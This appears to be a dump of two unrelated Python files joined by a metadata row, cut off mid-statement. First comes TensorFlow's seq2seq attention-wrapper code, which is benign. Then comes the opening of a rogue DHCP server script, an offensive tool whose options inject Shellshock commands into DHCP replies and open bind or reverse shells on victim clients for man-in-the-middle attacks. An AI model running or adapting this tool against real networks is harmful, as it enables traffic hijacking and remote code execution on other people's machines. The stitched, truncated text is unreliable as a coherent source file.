p_choose_i = ops.convert_to_tensor(p_choose_i, name="p_choose_i")
previous_attention = ops.convert_to_tensor(
previous_attention, name="previous_attention")
if mode == "recursive":
# Use .shape[0].value when it's not None, or fall back on symbolic shape
batch_size = p_choose_i.shape[0].value or array_ops.shape(p_choose_i)[0]
# Compute [1, 1 - p_choose_i[0], 1 - p_choose_i[1], ..., 1 - p_choose_i[-2]]
shifted_1mp_choose_i = array_ops.concat(
[array_ops.ones((batch_size, 1)), 1 - p_choose_i[:, :-1]], 1)
# Compute attention distribution recursively as
# q[i] = (1 - p_choose_i[i])*q[i - 1] + previous_attention[i]
# attention[i] = p_choose_i[i]*q[i]
attention = p_choose_i*array_ops.transpose(functional_ops.scan(
# Need to use reshape to remind TF of the shape between loop iterations
lambda x, yz: array_ops.reshape(yz[0]*x + yz[1], (batch_size,)),
# Loop variables yz[0] and yz[1]
[array_ops.transpose(shifted_1mp_choose_i),
array_ops.transpose(previous_attention)],
# Initial value of x is just zeros
array_ops.zeros((batch_size,))))
elif mode == "parallel":
# safe_cumprod computes cumprod in logspace with numeric checks
cumprod_1mp_choose_i = safe_cumprod(1 - p_choose_i, axis=1, exclusive=True)
# Compute recurrence relation solution
attention = p_choose_i*cumprod_1mp_choose_i*math_ops.cumsum(
previous_attention /
# Clip cumprod_1mp to avoid divide-by-zero
clip_ops.clip_by_value(cumprod_1mp_choose_i, 1e-10, 1.), axis=1)
elif mode == "hard":
# Remove any probabilities before the index chosen last time step
p_choose_i *= math_ops.cumsum(previous_attention, axis=1)
# Now, use exclusive cumprod to remove probabilities after the first
# chosen index, like so:
# p_choose_i = [0, 0, 0, 1, 1, 0, 1, 1]
# cumprod(1 - p_choose_i, exclusive=True) = [1, 1, 1, 1, 0, 0, 0, 0]
# Product of above: [0, 0, 0, 1, 0, 0, 0, 0]
attention = p_choose_i*math_ops.cumprod(
1 - p_choose_i, axis=1, exclusive=True)
else:
raise ValueError("mode must be 'recursive', 'parallel', or 'hard'.")
return attention
def _monotonic_probability_fn(score, previous_alignments, sigmoid_noise, mode,
seed=None):
"""Attention probability function for monotonic attention.
Takes in unnormalized attention scores, adds pre-sigmoid noise to encourage
the model to make discrete attention decisions, passes them through a sigmoid
to obtain "choosing" probabilities, and then calls monotonic_attention to
obtain the attention distribution. For more information, see
Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck,
"Online and Linear-Time Attention by Enforcing Monotonic Alignments."
ICML 2017. https://arxiv.org/abs/1704.00784
Args:
score: Unnormalized attention scores, shape `[batch_size, alignments_size]`
previous_alignments: Previous attention distribution, shape
`[batch_size, alignments_size]`
sigmoid_noise: Standard deviation of pre-sigmoid noise. Setting this larger
than 0 will encourage the model to produce large attention scores,
effectively making the choosing probabilities discrete and the resulting
attention distribution one-hot. It should be set to 0 at test-time, and
when hard attention is not desired.
mode: How to compute the attention distribution. Must be one of
'recursive', 'parallel', or 'hard'. See the docstring for
`tf.contrib.seq2seq.monotonic_attention` for more information.
seed: (optional) Random seed for pre-sigmoid noise.
Returns:
A `[batch_size, alignments_size]`-shape tensor corresponding to the
resulting attention distribution.
"""
# Optionally add pre-sigmoid noise to the scores
if sigmoid_noise > 0:
noise = random_ops.random_normal(array_ops.shape(score), dtype=score.dtype,
seed=seed)
score += sigmoid_noise*noise
# Compute "choosing" probabilities from the attention scores
if mode == "hard":
# When mode is hard, use a hard sigmoid
p_choose_i = math_ops.cast(score > 0, score.dtype)
else:
p_choose_i = math_ops.sigmoid(score)
# Convert from choosing probabilities to attention distribution
return monotonic_attention(p_choose_i, previous_alignments, mode)
class _BaseMonotonicAttentionMechanism(_BaseAttentionMechanism):
"""Base attention mechanism for monotonic attention.
Simply overrides the initial_alignments function to provide a dirac
distribution,which is needed in order for the monotonic attention
distributions to have the correct behavior.
"""
def initial_alignments(self, batch_size, dtype):
"""Creates the initial alignment values for the monotonic attentions.
Initializes to dirac distributions, i.e. [1, 0, 0, ...memory length..., 0]
for all entries in the batch.
Args:
batch_size: `int32` scalar, the batch_size.
dtype: The `dtype`.
Returns:
A `dtype` tensor shaped `[batch_size, alignments_size]`
(`alignments_size` is the values' `max_time`).
"""
max_time = self._alignments_size
return array_ops.one_hot(
array_ops.zeros((batch_size,), dtype=dtypes.int32), max_time,
dtype=dtype)
class BahdanauMonotonicAttention(_BaseMonotonicAttentionMechanism):
"""Monotonic attention mechanism with Bahadanau-style energy function.
This type of attention encorces a monotonic constraint on the attention
distributions; that is once the model attends to a given point in the memory
it can't attend to any prior points at subsequence output timesteps. It
achieves this by using the _monotonic_probability_fn instead of softmax to
construct its attention distributions. Since the attention scores are passed
through a sigmoid, a learnable scalar bias parameter is applied after the
score function and before the sigmoid. Otherwise, it is equivalent to
BahdanauAttention. This approach is proposed in
Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck,
"Online and Linear-Time Attention by Enforcing Monotonic Alignments."
ICML 2017. https://arxiv.org/abs/1704.00784
"""
def __init__(self,
num_units,
memory,
memory_sequence_length=None,
normalize=False,
score_mask_value=None,
sigmoid_noise=0.,
sigmoid_noise_seed=None,
score_bias_init=0.,
mode="parallel",
dtype=None,
name="BahdanauMonotonicAttention"):
"""Construct the Attention mechanism.
Args:
num_units: The depth of the query mechanism.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
memory_sequence_length (optional): Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
normalize: Python boolean. Whether to normalize the energy term.
score_mask_value: (optional): The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
sigmoid_noise: Standard deviation of pre-sigmoid noise. See the docstring
for `_monotonic_probability_fn` for more information.
sigmoid_noise_seed: (optional) Random seed for pre-sigmoid noise.
score_bias_init: Initial value for score bias scalar. It's recommended to
initialize this to a negative value when the length of the memory is
large.
mode: How to compute the attention distribution. Must be one of
'recursive', 'parallel', or 'hard'. See the docstring for
`tf.contrib.seq2seq.monotonic_attention` for more information.
dtype: The data type for the query and memory layers of the attention
mechanism.
name: Name to use when creating ops.
"""
# Set up the monotonic probability fn with supplied parameters
if dtype is None:
dtype = dtypes.float32
wrapped_probability_fn = functools.partial(
_monotonic_probability_fn, sigmoid_noise=sigmoid_noise, mode=mode,
seed=sigmoid_noise_seed)
super(BahdanauMonotonicAttention, self).__init__(
query_layer=layers_core.Dense(
num_units, name="query_layer", use_bias=False, dtype=dtype),
memory_layer=layers_core.Dense(
num_units, name="memory_layer", use_bias=False, dtype=dtype),
memory=memory,
probability_fn=wrapped_probability_fn,
memory_sequence_length=memory_sequence_length,
score_mask_value=score_mask_value,
name=name)
self._num_units = num_units
self._normalize = normalize
self._name = name
self._score_bias_init = score_bias_init
def __call__(self, query, state):
"""Score the query based on the keys and values.
Args:
query: Tensor of dtype matching `self.values` and shape
`[batch_size, query_depth]`.
state: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]`
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
with variable_scope.variable_scope(
None, "bahdanau_monotonic_attention", [query]):
processed_query = self.query_layer(query) if self.query_layer else query
score = _bahdanau_score(processed_query, self._keys, self._normalize)
score_bias = variable_scope.get_variable(
"attention_score_bias", dtype=processed_query.dtype,
initializer=self._score_bias_init)
score += score_bias
alignments = self._probability_fn(score, state)
next_state = alignments
return alignments, next_state
class LuongMonotonicAttention(_BaseMonotonicAttentionMechanism):
"""Monotonic attention mechanism with Luong-style energy function.
This type of attention encorces a monotonic constraint on the attention
distributions; that is once the model attends to a given point in the memory
it can't attend to any prior points at subsequence output timesteps. It
achieves this by using the _monotonic_probability_fn instead of softmax to
construct its attention distributions. Otherwise, it is equivalent to
LuongAttention. This approach is proposed in
Colin Raffel, Minh-Thang Luong, Peter J. Liu, Ron J. Weiss, Douglas Eck,
"Online and Linear-Time Attention by Enforcing Monotonic Alignments."
ICML 2017. https://arxiv.org/abs/1704.00784
"""
def __init__(self,
num_units,
memory,
memory_sequence_length=None,
scale=False,
score_mask_value=None,
sigmoid_noise=0.,
sigmoid_noise_seed=None,
score_bias_init=0.,
mode="parallel",
dtype=None,
name="LuongMonotonicAttention"):
"""Construct the Attention mechanism.
Args:
num_units: The depth of the query mechanism.
memory: The memory to query; usually the output of an RNN encoder. This
tensor should be shaped `[batch_size, max_time, ...]`.
memory_sequence_length (optional): Sequence lengths for the batch entries
in memory. If provided, the memory tensor rows are masked with zeros
for values past the respective sequence lengths.
scale: Python boolean. Whether to scale the energy term.
score_mask_value: (optional): The mask value for score before passing into
`probability_fn`. The default is -inf. Only used if
`memory_sequence_length` is not None.
sigmoid_noise: Standard deviation of pre-sigmoid noise. See the docstring
for `_monotonic_probability_fn` for more information.
sigmoid_noise_seed: (optional) Random seed for pre-sigmoid noise.
score_bias_init: Initial value for score bias scalar. It's recommended to
initialize this to a negative value when the length of the memory is
large.
mode: How to compute the attention distribution. Must be one of
'recursive', 'parallel', or 'hard'. See the docstring for
`tf.contrib.seq2seq.monotonic_attention` for more information.
dtype: The data type for the query and memory layers of the attention
mechanism.
name: Name to use when creating ops.
"""
# Set up the monotonic probability fn with supplied parameters
if dtype is None:
dtype = dtypes.float32
wrapped_probability_fn = functools.partial(
_monotonic_probability_fn, sigmoid_noise=sigmoid_noise, mode=mode,
seed=sigmoid_noise_seed)
super(LuongMonotonicAttention, self).__init__(
query_layer=None,
memory_layer=layers_core.Dense(
num_units, name="memory_layer", use_bias=False, dtype=dtype),
memory=memory,
probability_fn=wrapped_probability_fn,
memory_sequence_length=memory_sequence_length,
score_mask_value=score_mask_value,
name=name)
self._num_units = num_units
self._scale = scale
self._score_bias_init = score_bias_init
self._name = name
def __call__(self, query, state):
"""Score the query based on the keys and values.
Args:
query: Tensor of dtype matching `self.values` and shape
`[batch_size, query_depth]`.
state: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]`
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
with variable_scope.variable_scope(None, "luong_monotonic_attention",
[query]):
score = _luong_score(query, self._keys, self._scale)
score_bias = variable_scope.get_variable(
"attention_score_bias", dtype=query.dtype,
initializer=self._score_bias_init)
score += score_bias
alignments = self._probability_fn(score, state)
next_state = alignments
return alignments, next_state
class AttentionWrapperState(
collections.namedtuple("AttentionWrapperState",
("cell_state", "attention", "time", "alignments",
"alignment_history", "attention_state"))):
"""`namedtuple` storing the state of a `AttentionWrapper`.
Contains:
- `cell_state`: The state of the wrapped `RNNCell` at the previous time
step.
- `attention`: The attention emitted at the previous time step.
- `time`: int32 scalar containing the current time step.
- `alignments`: A single or tuple of `Tensor`(s) containing the alignments
emitted at the previous time step for each attention mechanism.
- `alignment_history`: (if enabled) a single or tuple of `TensorArray`(s)
containing alignment matrices from all time steps for each attention
mechanism. Call `stack()` on each to convert to a `Tensor`.
- `attention_state`: A single or tuple of nested objects
containing attention mechanism state for each attention mechanism.
The objects may contain Tensors or TensorArrays.
"""
def clone(self, **kwargs):
"""Clone this object, overriding components provided by kwargs.
The new state fields' shape must match original state fields' shape. This
will be validated, and original fields' shape will be propagated to new
fields.
Example:
```python
initial_state = attention_wrapper.zero_state(dtype=..., batch_size=...)
initial_state = initial_state.clone(cell_state=encoder_state)
```
Args:
**kwargs: Any properties of the state object to replace in the returned
`AttentionWrapperState`.
Returns:
A new `AttentionWrapperState` whose properties are the same as
this one, except any overridden properties as provided in `kwargs`.
"""
def with_same_shape(old, new):
"""Check and set new tensor's shape."""
if isinstance(old, ops.Tensor) and isinstance(new, ops.Tensor):
return tensor_util.with_same_shape(old, new)
return new
return nest.map_structure(
with_same_shape,
self,
super(AttentionWrapperState, self)._replace(**kwargs))
def hardmax(logits, name=None):
"""Returns batched one-hot vectors.
The depth index containing the `1` is that of the maximum logit value.
Args:
logits: A batch tensor of logit values.
name: Name to use when creating ops.
Returns:
A batched one-hot tensor.
"""
with ops.name_scope(name, "Hardmax", [logits]):
logits = ops.convert_to_tensor(logits, name="logits")
if logits.get_shape()[-1].value is not None:
depth = logits.get_shape()[-1].value
else:
depth = array_ops.shape(logits)[-1]
return array_ops.one_hot(
math_ops.argmax(logits, -1), depth, dtype=logits.dtype)
def _compute_attention(attention_mechanism, cell_output, attention_state,
attention_layer):
"""Computes the attention and alignments for a given attention_mechanism."""
alignments, next_attention_state = attention_mechanism(
cell_output, state=attention_state)
# Reshape from [batch_size, memory_time] to [batch_size, 1, memory_time]
expanded_alignments = array_ops.expand_dims(alignments, 1)
# Context is the inner product of alignments and values along the
# memory time dimension.
# alignments shape is
# [batch_size, 1, memory_time]
# attention_mechanism.values shape is
# [batch_size, memory_time, memory_size]
# the batched matmul is over memory_time, so the output shape is
# [batch_size, 1, memory_size].
# we then squeeze out the singleton dim.
context = math_ops.matmul(expanded_alignments, attention_mechanism.values)
context = array_ops.squeeze(context, [1])
if attention_layer is not None:
attention = attention_layer(array_ops.concat([cell_output, context], 1))
else:
attention = context
return attention, alignments, next_attention_state
class AttentionWrapper(rnn_cell_impl.RNNCell):
"""Wraps another `RNNCell` with attention.
"""
def __init__(self,
cell,
attention_mechanism,
attention_layer_size=None,
alignment_history=False,
cell_input_fn=None,
output_attention=True,
initial_cell_state=None,
name=None):
"""Construct the `AttentionWrapper`.
**NOTE** If you are using the `BeamSearchDecoder` with a cell wrapped in
`AttentionWrapper`, then you must ensure that:
- The encoder output has been tiled to `beam_width` via
@{tf.contrib.seq2seq.tile_batch} (NOT `tf.tile`).
- The `batch_size` argument passed to the `zero_state` method of this
wrapper is equal to `true_batch_size * beam_width`.
- The initial state created with `zero_state` above contains a
`cell_state` value containing properly tiled final state from the
encoder.
An example:
```
tiled_encoder_outputs = tf.contrib.seq2seq.tile_batch(
encoder_outputs, multiplier=beam_width)
tiled_encoder_final_state = tf.conrib.seq2seq.tile_batch(
encoder_final_state, multiplier=beam_width)
tiled_sequence_length = tf.contrib.seq2seq.tile_batch(
sequence_length, multiplier=beam_width)
attention_mechanism = MyFavoriteAttentionMechanism(
num_units=attention_depth,
memory=tiled_inputs,
memory_sequence_length=tiled_sequence_length)
attention_cell = AttentionWrapper(cell, attention_mechanism, ...)
decoder_initial_state = attention_cell.zero_state(
dtype, batch_size=true_batch_size * beam_width)
decoder_initial_state = decoder_initial_state.clone(
cell_state=tiled_encoder_final_state)
```
Args:
cell: An instance of `RNNCell`.
attention_mechanism: A list of `AttentionMechanism` instances or a single
instance.
attention_layer_size: A list of Python integers or a single Python
integer, the depth of the attention (output) layer(s). If None
(default), use the context as attention at each time step. Otherwise,
feed the context and cell output into the attention layer to generate
attention at each time step. If attention_mechanism is a list,
attention_layer_size must be a list of the same length.
alignment_history: Python boolean, whether to store alignment history
from all time steps in the final output state (currently stored as a
time major `TensorArray` on which you must call `stack()`).
cell_input_fn: (optional) A `callable`. The default is:
`lambda inputs, attention: array_ops.concat([inputs, attention], -1)`.
output_attention: Python bool. If `True` (default), the output at each
time step is the attention value. This is the behavior of Luong-style
attention mechanisms. If `False`, the output at each time step is
the output of `cell`. This is the beahvior of Bhadanau-style
attention mechanisms. In both cases, the `attention` tensor is
propagated to the next time step via the state and is used there.
This flag only controls whether the attention mechanism is propagated
up to the next cell in an RNN stack or to the top RNN output.
initial_cell_state: The initial state value to use for the cell when
the user calls `zero_state()`. Note that if this value is provided
now, and the user uses a `batch_size` argument of `zero_state` which
does not match the batch size of `initial_cell_state`, proper
behavior is not guaranteed.
name: Name to use when creating ops.
Raises:
TypeError: `attention_layer_size` is not None and (`attention_mechanism`
is a list but `attention_layer_size` is not; or vice versa).
ValueError: if `attention_layer_size` is not None, `attention_mechanism`
is a list, and its length does not match that of `attention_layer_size`.
"""
super(AttentionWrapper, self).__init__(name=name)
rnn_cell_impl.assert_like_rnncell("cell", cell)
if isinstance(attention_mechanism, (list, tuple)):
self._is_multi = True
attention_mechanisms = attention_mechanism
for attention_mechanism in attention_mechanisms:
if not isinstance(attention_mechanism, AttentionMechanism):
raise TypeError(
"attention_mechanism must contain only instances of "
"AttentionMechanism, saw type: %s"
% type(attention_mechanism).__name__)
else:
self._is_multi = False
if not isinstance(attention_mechanism, AttentionMechanism):
raise TypeError(
"attention_mechanism must be an AttentionMechanism or list of "
"multiple AttentionMechanism instances, saw type: %s"
% type(attention_mechanism).__name__)
attention_mechanisms = (attention_mechanism,)
if cell_input_fn is None:
cell_input_fn = (
lambda inputs, attention: array_ops.concat([inputs, attention], -1))
else:
if not callable(cell_input_fn):
raise TypeError(
"cell_input_fn must be callable, saw type: %s"
% type(cell_input_fn).__name__)
if attention_layer_size is not None:
attention_layer_sizes = tuple(
attention_layer_size
if isinstance(attention_layer_size, (list, tuple))
else (attention_layer_size,))
if len(attention_layer_sizes) != len(attention_mechanisms):
raise ValueError(
"If provided, attention_layer_size must contain exactly one "
"integer per attention_mechanism, saw: %d vs %d"
% (len(attention_layer_sizes), len(attention_mechanisms)))
self._attention_layers = tuple(
layers_core.Dense(
attention_layer_size,
name="attention_layer",
use_bias=False,
dtype=attention_mechanisms[i].dtype)
for i, attention_layer_size in enumerate(attention_layer_sizes))
self._attention_layer_size = sum(attention_layer_sizes)
else:
self._attention_layers = None
self._attention_layer_size = sum(
attention_mechanism.values.get_shape()[-1].value
for attention_mechanism in attention_mechanisms)
self._cell = cell
self._attention_mechanisms = attention_mechanisms
self._cell_input_fn = cell_input_fn
self._output_attention = output_attention
self._alignment_history = alignment_history
with ops.name_scope(name, "AttentionWrapperInit"):
if initial_cell_state is None:
self._initial_cell_state = None
else:
final_state_tensor = nest.flatten(initial_cell_state)[-1]
state_batch_size = (
final_state_tensor.shape[0].value
or array_ops.shape(final_state_tensor)[0])
error_message = (
"When constructing AttentionWrapper %s: " % self._base_name +
"Non-matching batch sizes between the memory "
"(encoder output) and initial_cell_state. Are you using "
"the BeamSearchDecoder? You may need to tile your initial state "
"via the tf.contrib.seq2seq.tile_batch function with argument "
"multiple=beam_width.")
with ops.control_dependencies(
self._batch_size_checks(state_batch_size, error_message)):
self._initial_cell_state = nest.map_structure(
lambda s: array_ops.identity(s, name="check_initial_cell_state"),
initial_cell_state)
def _batch_size_checks(self, batch_size, error_message):
return [check_ops.assert_equal(batch_size,
attention_mechanism.batch_size,
message=error_message)
for attention_mechanism in self._attention_mechanisms]
def _item_or_tuple(self, seq):
"""Returns `seq` as tuple or the singular element.
Which is returned is determined by how the AttentionMechanism(s) were passed
to the constructor.
Args:
seq: A non-empty sequence of items or generator.
Returns:
Either the values in the sequence as a tuple if AttentionMechanism(s)
were passed to the constructor as a sequence or the singular element.
"""
t = tuple(seq)
if self._is_multi:
return t
else:
return t[0]
@property
def output_size(self):
if self._output_attention:
return self._attention_layer_size
else:
return self._cell.output_size
@property
def state_size(self):
"""The `state_size` property of `AttentionWrapper`.
Returns:
An `AttentionWrapperState` tuple containing shapes used by this object.
"""
return AttentionWrapperState(
cell_state=self._cell.state_size,
time=tensor_shape.TensorShape([]),
attention=self._attention_layer_size,
alignments=self._item_or_tuple(
a.alignments_size for a in self._attention_mechanisms),
attention_state=self._item_or_tuple(
a.state_size for a in self._attention_mechanisms),
alignment_history=self._item_or_tuple(
a.alignments_size if self._alignment_history else ()
for a in self._attention_mechanisms)) # sometimes a TensorArray
def zero_state(self, batch_size, dtype):
"""Return an initial (zero) state tuple for this `AttentionWrapper`.
**NOTE** Please see the initializer documentation for details of how
to call `zero_state` if using an `AttentionWrapper` with a
`BeamSearchDecoder`.
Args:
batch_size: `0D` integer tensor: the batch size.
dtype: The internal state data type.
Returns:
An `AttentionWrapperState` tuple containing zeroed out tensors and,
possibly, empty `TensorArray` objects.
Raises:
ValueError: (or, possibly at runtime, InvalidArgument), if
`batch_size` does not match the output size of the encoder passed
to the wrapper object at initialization time.
"""
with ops.name_scope(type(self).__name__ + "ZeroState", values=[batch_size]):
if self._initial_cell_state is not None:
cell_state = self._initial_cell_state
else:
cell_state = self._cell.zero_state(batch_size, dtype)
error_message = (
"When calling zero_state of AttentionWrapper %s: " % self._base_name +
"Non-matching batch sizes between the memory "
"(encoder output) and the requested batch size. Are you using "
"the BeamSearchDecoder? If so, make sure your encoder output has "
"been tiled to beam_width via tf.contrib.seq2seq.tile_batch, and "
"the batch_size= argument passed to zero_state is "
"batch_size * beam_width.")
with ops.control_dependencies(
self._batch_size_checks(batch_size, error_message)):
cell_state = nest.map_structure(
lambda s: array_ops.identity(s, name="checked_cell_state"),
cell_state)
initial_alignments = [
attention_mechanism.initial_alignments(batch_size, dtype)
for attention_mechanism in self._attention_mechanisms]
return AttentionWrapperState(
cell_state=cell_state,
time=array_ops.zeros([], dtype=dtypes.int32),
attention=_zero_state_tensors(self._attention_layer_size, batch_size,
dtype),
alignments=self._item_or_tuple(initial_alignments),
attention_state=self._item_or_tuple(
attention_mechanism.initial_state(batch_size, dtype)
for attention_mechanism in self._attention_mechanisms),
alignment_history=self._item_or_tuple(
tensor_array_ops.TensorArray(
dtype,
size=0,
dynamic_size=True,
element_shape=alignment.shape)
if self._alignment_history else ()
for alignment in initial_alignments))
def call(self, inputs, state):
"""Perform a step of attention-wrapped RNN.
- Step 1: Mix the `inputs` and previous step's `attention` output via
`cell_input_fn`.
- Step 2: Call the wrapped `cell` with this input and its previous state.
- Step 3: Score the cell's output with `attention_mechanism`.
- Step 4: Calculate the alignments by passing the score through the
`normalizer`.
- Step 5: Calculate the context vector as the inner product between the
alignments and the attention_mechanism's values (memory).
- Step 6: Calculate the attention output by concatenating the cell output
and context through the attention layer (a linear layer with
`attention_layer_size` outputs).
Args:
inputs: (Possibly nested tuple of) Tensor, the input at this time step.
state: An instance of `AttentionWrapperState` containing
tensors from the previous time step.
Returns:
A tuple `(attention_or_cell_output, next_state)`, where:
- `attention_or_cell_output` depending on `output_attention`.
- `next_state` is an instance of `AttentionWrapperState`
containing the state calculated at this time step.
Raises:
TypeError: If `state` is not an instance of `AttentionWrapperState`.
"""
if not isinstance(state, AttentionWrapperState):
raise TypeError("Expected state to be instance of AttentionWrapperState. "
"Received type %s instead." % type(state))
# Step 1: Calculate the true inputs to the cell based on the
# previous attention value.
cell_inputs = self._cell_input_fn(inputs, state.attention)
cell_state = state.cell_state
cell_output, next_cell_state = self._cell(cell_inputs, cell_state)
cell_batch_size = (
cell_output.shape[0].value or array_ops.shape(cell_output)[0])
error_message = (
"When applying AttentionWrapper %s: " % self.name +
"Non-matching batch sizes between the memory "
"(encoder output) and the query (decoder output). Are you using "
"the BeamSearchDecoder? You may need to tile your memory input via "
"the tf.contrib.seq2seq.tile_batch function with argument "
"multiple=beam_width.")
with ops.control_dependencies(
self._batch_size_checks(cell_batch_size, error_message)):
cell_output = array_ops.identity(
cell_output, name="checked_cell_output")
if self._is_multi:
previous_attention_state = state.attention_state
previous_alignment_history = state.alignment_history
else:
previous_attention_state = [state.attention_state]
previous_alignment_history = [state.alignment_history]
all_alignments = []
all_attentions = []
all_attention_states = []
maybe_all_histories = []
for i, attention_mechanism in enumerate(self._attention_mechanisms):
attention, alignments, next_attention_state = _compute_attention(
attention_mechanism, cell_output, previous_attention_state[i],
self._attention_layers[i] if self._attention_layers else None)
alignment_history = previous_alignment_history[i].write(
state.time, alignments) if self._alignment_history else ()
all_attention_states.append(next_attention_state)
all_alignments.append(alignments)
all_attentions.append(attention)
maybe_all_histories.append(alignment_history)
attention = array_ops.concat(all_attentions, 1)
next_state = AttentionWrapperState(
time=state.time + 1,
cell_state=next_cell_state,
attention=attention,
attention_state=self._item_or_tuple(all_attention_states),
alignments=self._item_or_tuple(all_alignments),
alignment_history=self._item_or_tuple(maybe_all_histories))
if self._output_attention:
return attention, next_state
else:
return cell_output, next_state
| apache-2.0 | -8,393,192,901,681,401,000 | 40.782821 | 94 | 0.670449 | false | 3.934828 | false | false | false |
Vladimir-Ivanov-Git/raw-packet | Scripts/DHCP/dhcp_rogue_server.py | 1 | 47873 | #!/usr/bin/env python
# region Import
from sys import path
from os.path import dirname, abspath
project_root_path = dirname(dirname(dirname(abspath(__file__))))
utils_path = project_root_path + "/Utils/"
path.append(utils_path)
from base import Base
from network import Ethernet_raw, ARP_raw, IP_raw, UDP_raw, DHCP_raw
from tm import ThreadManager
from scanner import Scanner
from sys import exit
from argparse import ArgumentParser
from ipaddress import IPv4Address
from socket import socket, AF_PACKET, SOCK_RAW, htons
from os import errno, makedirs
from shutil import copyfile
from base64 import b64encode
from netaddr import IPAddress
from time import sleep
from random import randint
import subprocess as sub
# endregion
# region Check user, platform and create threads
Base = Base()
Scanner = Scanner()
Base.check_user()
Base.check_platform()
tm = ThreadManager(3)
# endregion
# region Parse script arguments
parser = ArgumentParser(description='DHCP Rogue server')
parser.add_argument('-i', '--interface', help='Set interface name for send reply packets')
parser.add_argument('-f', '--first_offer_ip', type=str, help='Set first client ip for offering', default=None)
parser.add_argument('-l', '--last_offer_ip', type=str, help='Set last client ip for offering', default=None)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
parser.add_argument('-T', '--target_ip', type=str, help='Set client IP address with MAC in --target_mac', default=None)
parser.add_argument('-m', '--netmask', type=str, help='Set network mask', default=None)
parser.add_argument('--dhcp_mac', type=str, help='Set DHCP server MAC address, if not set use your MAC address', default=None)
parser.add_argument('--dhcp_ip', type=str, help='Set DHCP server IP address, if not set use your IP address', default=None)
parser.add_argument('--router', type=str, help='Set router IP address, if not set use your ip address', default=None)
parser.add_argument('--dns', type=str, help='Set DNS server IP address, if not set use your ip address', default=None)
parser.add_argument('--tftp', type=str, help='Set TFTP server IP address', default=None)
parser.add_argument('--wins', type=str, help='Set WINS server IP address', default=None)
parser.add_argument('--proxy', type=str, help='Set Proxy URL, example: 192.168.0.1:8080', default=None)
parser.add_argument('--domain', type=str, help='Set domain name for search, default=local', default="local")
parser.add_argument('--lease_time', type=int, help='Set lease time, default=172800', default=172800)
parser.add_argument('-s', '--send_discover', action='store_true',
help='Send DHCP discover packets in the background thread')
parser.add_argument('-r', '--discover_rand_mac', action='store_true',
help='Use random MAC address for source MAC address in DHCP discover packets')
parser.add_argument('-d', '--discover_delay', type=float,
help='Set delay between DHCP discover packets (default=0.5 sec.)', default=0.5)
parser.add_argument('-O', '--shellshock_option_code', type=int,
help='Set dhcp option code for inject shellshock payload, default=114', default=114)
parser.add_argument('-c', '--shellshock_command', type=str, help='Set shellshock command in DHCP client')
parser.add_argument('-b', '--bind_shell', action='store_true', help='Use awk bind tcp shell in DHCP client')
parser.add_argument('-p', '--bind_port', type=int, help='Set port for listen bind shell (default=1234)', default=1234)
parser.add_argument('-N', '--nc_reverse_shell', action='store_true', help='Use nc reverse tcp shell in DHCP client')
parser.add_argument('-E', '--nce_reverse_shell', action='store_true', help='Use nc -e reverse tcp shell in DHCP client')
parser.add_argument('-R', '--bash_reverse_shell', action='store_true', help='Use bash reverse tcp shell in DHCP client')
parser.add_argument('-e', '--reverse_port', type=int, help='Set port for listen bind shell (default=443)', default=443)
parser.add_argument('-n', '--without_network', action='store_true', help='Do not add network configure in payload')
parser.add_argument('-B', '--without_base64', action='store_true', help='Do not use base64 encode in payload')
parser.add_argument('--ip_path', type=str,
help='Set path to "ip" in shellshock payload, default = /bin/', default="/bin/")
parser.add_argument('--iface_name', type=str,
help='Set iface name in shellshock payload, default = eth0', default="eth0")
parser.add_argument('--broadcast_response', action='store_true', help='Send broadcast response')
parser.add_argument('--dnsop', action='store_true', help='Do not send DHCP OFFER packets')
parser.add_argument('--exit', action='store_true', help='Exit on success MiTM attack')
parser.add_argument('-q', '--quiet', action='store_true', help='Minimal output')
args = parser.parse_args()
# endregion
# region Print banner if argument quit is not set
if not args.quiet:
Base.print_banner()
# endregion
# region Set global variables
eth = Ethernet_raw()
arp = ARP_raw()
ip = IP_raw()
udp = UDP_raw()
dhcp = DHCP_raw()
first_offer_ip_address = None
last_offer_ip_address = None
network_mask = None
target_mac_address = None
target_ip_address = None
dhcp_server_mac_address = None
dhcp_server_ip_address = None
router_ip_address = None
dns_server_ip_address = None
tftp_server_ip_address = None
wins_server_ip_address = None
wpad_url = None
dhcp_discover_packets_source_mac = None
free_ip_addresses = []
clients = {}
shellshock_url = None
domain = None
payload = None
SOCK = None
discover_sender_is_work = False
# endregion
# region Get your network settings
if args.interface is None:
Base.print_warning("Please set a network interface for sniffing ARP and DHCP requests ...")
current_network_interface = Base.netiface_selection(args.interface)
your_mac_address = Base.get_netiface_mac_address(current_network_interface)
if your_mac_address is None:
Base.print_error("Network interface: ", current_network_interface, " do not have MAC address!")
exit(1)
your_ip_address = Base.get_netiface_ip_address(current_network_interface)
if your_ip_address is None:
Base.print_error("Network interface: ", current_network_interface, " do not have IP address!")
exit(1)
your_network_mask = Base.get_netiface_netmask(current_network_interface)
if your_network_mask is None:
Base.print_error("Network interface: ", current_network_interface, " do not have network mask!")
exit(1)
if args.netmask is None:
network_mask = your_network_mask
else:
network_mask = args.netmask
# endregion
# region Create raw socket
SOCK = socket(AF_PACKET, SOCK_RAW)
SOCK.bind((current_network_interface, 0))
# endregion
# region Get first and last IP address in your network
first_ip_address = str(IPv4Address(unicode(Base.get_netiface_first_ip(current_network_interface))) - 1)
last_ip_address = str(IPv4Address(unicode(Base.get_netiface_last_ip(current_network_interface))) + 1)
# endregion
# region Set target MAC and IP address, if target IP is not set - get first and last offer IP
if args.target_mac is not None:
target_mac_address = str(args.target_mac).lower()
# region Target IP is set
if args.target_ip is not None:
if args.target_mac is not None:
if not Base.ip_address_in_range(args.target_ip, first_ip_address, last_ip_address):
